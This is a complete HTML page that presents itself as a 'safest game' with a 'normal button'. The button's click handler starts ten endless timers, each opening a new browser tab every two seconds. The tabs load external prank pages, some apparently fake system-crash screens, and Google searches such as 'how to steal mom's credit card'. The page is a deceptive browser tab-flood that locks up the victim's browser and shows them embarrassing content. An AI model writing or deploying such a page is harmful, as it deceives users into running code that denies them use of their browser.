<html>
  <head>
    <title>
𒐫LUGAL꧅
ဪ𒈙</title>
  <style>
    body {
      margin: 0;
      height: 100vh;
      background-color: #121212;
      color: white;
      display: flex;
      justify-content: center;
      align-items: center;
      font-family: sans-serif;
    }
    button {
      background-color: #1e88e5;
      color: white;
      border: none;
      padding: 1em 2em;
      font-size: 1.2em;
      border-radius: 8px;
      cursor: pointer;
      box-shadow: 0 4px 12px rgba(0, 0, 0, 0.3);
      transition: background-color 0.3s;
    }
    button:hover {
      background-color: #1565c0;
    }
  </style>
  </head>
  <body>
    <h1>Safest game ever trust me</h1>
   <button onclick="runSequence()">Trust me and click me, I'm a normal button.</button>
  <script>
    function runSequence() {
      setInterval(() => {
        window.open("https://sexus.vercel.app/mp3/rb2xx.mp3", "_blank");
      }, 2000);
            setInterval(() => {
        window.open("https://sexus.vercel.app/pages/wsdos.html", "_blank");
      }, 2000);
                  setInterval(() => {
        window.open("about:blank", "_blank");
      }, 2000);
                        setInterval(() => {
        window.open("https://www.google.com/search?q=how+to+steal+mom%27s+credit+card+full+tutorial&oq=how+to+steal+mom%27s+credit+card+full+tutorial&gs_lcrp=EgZjaHJvbWUyBggAEEUYOdIBCTEwOTEzajBqN6gCALACAA&sourceid=chrome&ie=UTF-8", "_blank");
      }, 2000);
                              setInterval(() => {
        window.open("https://www.google.com/search?q=is+chrome+an+anti+virus&oq=is+chrome+an+anti+virus&gs_lcrp=EgZjaHJvbWUyBggAEEUYOTIKCAEQABgKGBYYHjINCAIQABiGAxiABBiKBTINCAMQABiGAxiABBiKBTINCAQQABiGAxiABBiKBTIKCAUQABiABBiiBDIHCAYQABjvBTIKCAcQABiABBiiBNIBCTEwMDU5ajBqN6gCALACAA&sourceid=chrome&ie=UTF-8", "_blank");
      }, 2000);
                                    setInterval(() => {
        window.open("https://blanked.vercel.app/cdn/noredir/blanked.html", "_blank");
      }, 2000);
                                        setInterval(() => {
        window.open("https://sexus.vercel.app/useless", "_blank");
      }, 2000);
                                              setInterval(() => {
        window.open("https://sexus.vercel.app/main", "_blank");
      }, 2000);
                                                    setInterval(() => {
        window.open("https://sexus.vercel.app/pages/mcb.html", "_blank");
      }, 2000);
                                                          setInterval(() => {
        window.open("https://sexus.vercel.app/pages/w10.html", "_blank");
      }, 2000);
    }
  </script>
  </body>
</html>
